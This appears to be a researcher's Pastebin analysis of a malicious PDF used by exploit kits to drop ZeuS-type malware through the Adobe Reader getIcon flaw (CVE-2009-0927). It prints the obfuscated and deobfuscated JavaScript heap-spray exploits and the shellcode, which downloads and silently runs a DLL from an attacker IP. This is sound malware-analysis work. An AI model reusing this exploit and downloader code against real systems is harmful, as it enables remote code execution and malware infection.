Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Virus Total report is:
- https://www.virustotal.com/file/16e7b2f923b0c6f4c194ae791848b70030fa2093da0ee95a3ee926abd679fb81/analysis/
- Sample:
- MD5: 5e77446f3a89fac8cabb49b69cb1471c
- File size: 11.8 KB ( 12088 bytes )
- File name: dropped.pdf
- File type: PDF
- This is the malware PDF file to exploit your PC's with CVE-2009-0927 (Adobe getIcon flaw), then downloading the payload and runs it as process/daemon in your PC. This Malicious PDF is used by infection components by several Exploit Pack to infect malwares like ZeuS/Caberp/Ramnit, etc. Below is the analysis in details:
- =====================
- Found Here:
- =====================
- [code] --00:40:54-- hxxp://91.205.74.23/content/adp1.php?f=172
- => `adp1.php@f=172'
- Connecting to 91.205.74.23:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 12,088 (12K) [application/pdf]
- 100%[====================================>] 12,088 --.--K/s
- 00:40:54 (3.52 MB/s) - `adp1.php@f=172' saved [12088/12088] [/code]
- =====================
- Malware PDF Structure is:
- =====================
- [code] %PDF-1.6
- %粤マモ
- 7 0 obj
- <</Count 1/Type/Pages/Kids「28 0 R」>>
- endobj
- 21 0 obj
- <</Names 23 0 R/AcroForm 22 0 R/Pages 7 0 R/OCProperties<</D<</RBGroups「」>>>>/StructTreeRoot 11 0 R/Type/Catalog>>
- endobj
- 23 0 obj
- <</JavaScript 24 0 R/AP 8 0 R>>
- endobj
- 24 0 obj
- <</Names「123 0 R 76 0 R」>>
- endobj
- 25 0 obj
- <</S/JavaScript/JS 26 0 R>>
- endobj
- 26 0 obj
- <</Length 1108/Filter「/FlateDecode」>>stream
- endstream
- endobj
- 28 0 obj
- <</Parent 7 0 R/Contents 60 0 R/Rotate 90/MediaBox「0 0 12 92」/Resources<</XObject<</Im0 69 0 R>>/ColorSpace<</CS0 59 0 R>>/Font<</TT0 61 0 R>>/Properties/ExtGState>>/Type/Page>>
- endobj
- 60 0 obj
- <</Length 539/Filter/FlateDecode/Type/Contents>>stream
- endstream
- endobj
- 76 0 obj
- <</S/JavaScript/JS(
- x='e';
- arr='71@2@53@69@53@59@3@59@17@17@0@32@57@20@6@59@36@35@41@42@38@38@36@35@2@60@69@15@36@35@41@26@2@60@36@35@45@26@69@15@36@35@69@7@42@15@36@35@42@42@26@2@36@35@38@15@60@5@36@35@15@5@41@0@36@35@41@0@42@5@36@35@5@60@15@5@36@35@45@5@41@0@36@35@26@38@3@60@36@35@45@38@41@0@36@35@42@42@5@41@36@35@38@38@40@0@36@35@26@69@41@0@36@35@5@42@42@60@36@35@42@42@45@15@36@35@...........
- ...........
- ...........
- 8@39@29@67@70@71@57@48@68@69@40@71@49@48@23@69@37@56@10@49@39@69@28@53@23@35@10@10@17@55@25@60@49@67@60@70@53@69@17@29@25@49@53@17@55@25@25';
- cc={q:'b+f1k0=9-vl&WA|4 \)<:gDQnS}5zr{oVjpNu%w6yd83_,7EG.a@2>\(I;PsM"c「/Cx」Ktmehi*Uq"'}.q;
- q=x+'v'+'al';
- a=\(Date+String\).substr\(2,3\);
- aa=\(「」.unshift+「」.reverse\).substr\(2,3\);
- if \(aa==a\){
- t='3vtwe';
- e=t「'substr'」;
- w=e\(12\)「q」;
- s=「」;
- ar=arr.split\('@'\);
- n=cc;
- for\(i=0;i<ar.length;i++\){
- s「i」=n「ar「i」」;
- }
- if\(a===aa\)w\(s.join\(''\)\);
- }
- )>>
- endobj
- xref
- 0 155
- trailer
- <</Size 155
- /Root 21 0 R>>
- xref
- 0 0
- trailer
- <</Size 155/Prev 75626/XRefStm 416/Root 21 0 R>>
- startxref
- 78995
- %%EOF [/code]
- =====================
- If you deobfs the JS, E v a l value came up:
- =====================
- [code] if (e("1"))bjsg = "
- %u8366%ufce4%u85fc%u75e4%ue934%u335f%u64c0%u408b%u8b30%u0c40%u708b%u561c%u768b%u3308%u66db
- %u5e8b%u033c%u3374%u812c%u15ee%uff10%ub8ff%u408b%uc330%u3946%u7506%u87fb%u2434%ue485%u5175
- %uebe9%u514c%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%uadfc%uc503%udb33
- %ube0f%u3810%u74f2%uc108%u0dcb%uda03%ueb40%u3bf1%u751f%u5ee6%u5e8b%u0324%u66dd%u0c8b%u8d4b
- %uec46%u54ff%u0c24%ud88b%udd03%u048b%u038b%uabc5%u595e%uebc3%uad53%u688b%u8020%u0c7d%u7433
- %u9603%uf3eb%u688b%u8b08%u6af7%u5905%u98e8%uffff%ue2ff%ue8f9%u0000%u0000%u5058%u406a%uff68
- %u0000%u5000%uc083%u5019%u8b55%u8bec%u105e%uc383%uff05%u68e3%u6e6f%u0000%u7568%u6c72%u546d
- %u16ff%uc483%u8b08%ue8e8%uff61%uffff%u02eb%u72eb%uec81%u0104%u0000%u5c8d%u0c24%u04c7%u7224
- %u6765%uc773%u2444%u7604%u3372%uc732%u2444%u2008%u732d%u5320%uf868%u0000%uff00%u0c56%ue88b
- %uc933%uc751%u1d44%u7700%u6270%uc774%u1d44%u2e05%u6c64%uc66c%u1d44%u0009%u8a59%u04c1%u8830
- %u1d44%u4104%u6a51%u6a00%u5300%u6a57%uff00%u1456%uc085%u1675%u006a%uff53%u0456%u006a%ueb83
- %u530c%u56ff%u8304%u0cc3%u02eb%u13eb%u8047%u003f%ufa75%u8047%u003f%uc475%u006a%ufe6a%u56ff
- %ue808%ufe9c%uffff%u4e8e%uec0e%ufe98%u0e8a%u6f89%ubd01%uca33%u5b8a%uc61b%u7946%u1a36%u702f
- %u7468%u7074%u2f3a%u392f%u2e31%u3032%u2e35%u3437%u322e%u2f33%u2e77%u6870%u3f70%u3d66%u3731
- %u2632%u3d65%u0033%u0000";
- function ezvr(ra, qy){
- while (ra.length * 2 < qy){
- ra += ra;
- }
- ra = ra.substring(0, qy
- /2);return ra;} function bx(){var dkg=new Array();var vw=0x0c0c0c0c;var addr=0x400000;var
- payload=unescape(bjsg);var sc_len=payload.length*2;var qy=addr-(sc_len+0x38);var yarsp=une
- scape("%u9090%u9090");yarsp=ezvr(yarsp,qy);var count2=(vw-0x400000)/addr;
- for (var count = 0; count < count2; count ++ ){
- dkg「count」 = yarsp + payload;
- }
- var overflow = unescape("%u0c0c%u0c0c");
- while (overflow.length < 44952){
- overflow += overflow;
- }
- this .collabStore = Collab.collectEmailInfo({
- subj : "", msg : overflow
- }
- );
- }
- function printf(){
- nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
- var payload = unescape(bjsg);
- heapblock = nop + payload;
- bigblock = unescape("%u0A0A%u0A0A");
- headersize = 20;
- spray = headersize + heapblock.length;
- while (bigblock.length < spray){
- bigblock += bigblock;
- }
- fillblock = bigblock.substring(0, spray);
- block = bigblock.substring(0, bigblock.length - spray);
- while (block.length + spray < 0x40000){
- block = block + block + fillblock;
- }
- mem = new Array();
- for (i = 0; i < 1400; i ++ ){
- mem「i」 = block + heapblock;
- }
- var num =
- 129999999999999999998888888888888888888888888888888888888888888888888888888888888888888888
- 888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
- 888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
- 88888888888888888888888888;
- util.printf("%45000f", num);
- }
- function geticon(){
- var arry = new Array();
- if (app.doc.Collab.getIcon){
- var payload = unescape(bjsg);
- var hWq500CN = payload.length * 2;
- var qy = 0x400000 - (hWq500CN + 0x38);
- var yarsp = unescape("%u9090%u9090");
- yarsp = ezvr(yarsp, qy);
- var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000;
- for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y ++ ){
- arry「vqcQD96y」 = yarsp + payload;
- }
- var tUMhNbGw = unescape("%09");
- while (tUMhNbGw.length < 0x4000){
- tUMhNbGw += tUMhNbGw;
- }
- tUMhNbGw = "N." + tUMhNbGw;
- app.doc.Collab.getIcon(tUMhNbGw);
- }
- }
- aPlugins = app.plugIns;
- var sv = parseInt(app.viewerVersion.toString().charAt(0));
- for (var i = 0; i < aPlugins.length; i ++ ){
- if (aPlugins「i」.name == "EScript"){
- var lv = aPlugins「i」.version;
- }
- }
- if ((lv == 9) || ((sv == 8) && (lv <= 8.12))){
- geticon();
- }
- else if (lv == 7.1){
- printf();
- }
- else if (((sv == 6) || (sv == 7)) && (lv < 7.11)){
- bx();
- }
- else if ((lv >= 9.1) || (lv <= 9.2) || (lv >= 8.13) || (lv <= 8.17)){
- function a(){
- util.printd("p@111111111111111111111111 : yyyy111", new Date());
- }
- var h = app.plugIns;
- for (var f = 0; f < h.length; f ++ ){
- if (h「f」.name == "EScript"){
- var i = h「f」.version;
- }
- }
- if ((i > 8.12) && (i < 8.2)){
- c = new Array();
- var d = unescape("%u9090%u9090");
- var e = unescape(bjsg);
- while (d.length <= 0x8000){
- d += d;
- }
- d = d.substr(0, 0x8000 - e.length);
- for (f = 0; f < 2900; f ++ ){
- c「f」 = d + e;
- }
- a();
- a();
- try {
- this .media.newPlayer(null);
- }
- catch (e){
- }
- a();
- }
- }[/code]
- =====================
- Exploits found to execute malware downloads:
- =====================
- [code] CVE: CVE-2009-0927
- Desc: Adobe getIcon
- Expl: Stack-based buffer overflow in Adobe Reader and Acrobat
- via the getIcon method of a Collab object [/code]
- =====================
- Exploit Code:
- =====================
- [code] 4e 2e 09 09 09 09 09 09 09 09 09 09 09 09 09 09
- 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
- 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
- ...MORE 16,288 BYTES...
- 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
- 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
- 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
- 09 09 [/code]
- =====================
- Shellcode:
- =====================
- [code] 66 83 e4 fc fc 85 e4 75 34 e9 5f 33 c0 64 8b 40
- 30 8b 40 0c 8b 70 1c 56 8b 76 08 33 db 66 8b 5e
- 3c 03 74 33 2c 81 ee 15 10 ff ff b8 8b 40 30 c3
- 46 39 06 75 fb 87 34 24 85 e4 75 51 e9 eb 4c 51
- 56 8b 75 3c 8b 74 35 78 03 f5 56 8b 76 20 03 f5
- 33 c9 49 41 fc ad 03 c5 33 db 0f be 10 38 f2 74
- 08 c1 cb 0d 03 da 40 eb f1 3b 1f 75 e6 5e 8b 5e
- 24 03 dd 66 8b 0c 4b 8d 46 ec ff 54 24 0c 8b d8
- 03 dd 8b 04 8b 03 c5 ab 5e 59 c3 eb 53 ad 8b 68
- 20 80 7d 0c 33 74 03 96 eb f3 8b 68 08 8b f7 6a
- 05 59 e8 98 ff ff ff e2 f9 e8 00 00 00 00 58 50
- 6a 40 68 ff 00 00 00 50 83 c0 19 50 55 8b ec 8b
- 5e 10 83 c3 05 ff e3 68 6f 6e 00 00 68 75 72 6c
- 6d 54 ff 16 83 c4 08 8b e8 e8 61 ff ff ff eb 02
- eb 72 81 ec 04 01 00 00 8d 5c 24 0c c7 04 24 72
- 65 67 73 c7 44 24 04 76 72 33 32 c7 44 24 08 20
- 2d 73 20 53 68 f8 00 00 00 ff 56 0c 8b e8 33 c9
- 51 c7 44 1d 00 77 70 62 74 c7 44 1d 05 2e 64 6c
- 6c c6 44 1d 09 00 59 8a c1 04 30 88 44 1d 04 41
- 51 6a 00 6a 00 53 57 6a 00 ff 56 14 85 c0 75 16
- 6a 00 53 ff 56 04 6a 00 83 eb 0c 53 ff 56 04 83
- c3 0c eb 02 eb 13 47 80 3f 00 75 fa 47 80 3f 00
- 75 c4 6a 00 6a fe ff 56 08 e8 9c fe ff ff 8e 4e
- 0e ec 98 fe 8a 0e 89 6f 01 bd 33 ca 8a 5b 1b c6
- 46 79 36 1a 2f 70 68 74 74 70 3a 2f 2f 39 31 2e
- 32 30 35 2e 37 34 2e 32 33 2f 77 2e 70 68 70 3f
- 66 3d 31 37 32 26 65 3d 33 00 00 00 [/code]
- =====================
- Shellcode execution commands(uses: kernel32.DLL & urlmon.DLL)
- =====================
- [code] 0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4021be, dwSize=255)
- 0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
- 0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fa60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
- 0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=hxxp://91.205.74.23/w.php?f=172&e=3, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll) 0
- 0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
- 0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
- 0x7c81cb3b kernel32.TerminateThread(dwExitCode=0) [/code]
- =====================
- Shellcode Meanings:
- =====================
- [code] Preps env to exec command, call urlmon libs to download hxxp://91.205.74.23/w.php?f=172&e=3
- then save it at C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll and then execute it SILENTLY w/ WinEXEC &
- also register it ro runs as process/daemon w/ registry command. and then exit. [/code]
- ------
- ZeroDay Japan http://0day.jp
- OPERATION CLEANUP JAPAN | #OCJP
- Analyst: Hendrik ADRIAN アドリアン・ヘンドリック Malware Researcher VT/ twitter/google: @unixfreaxjp
- sponsored by: 株式会社ケイエルジェイテック http://www.kljtech.com
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement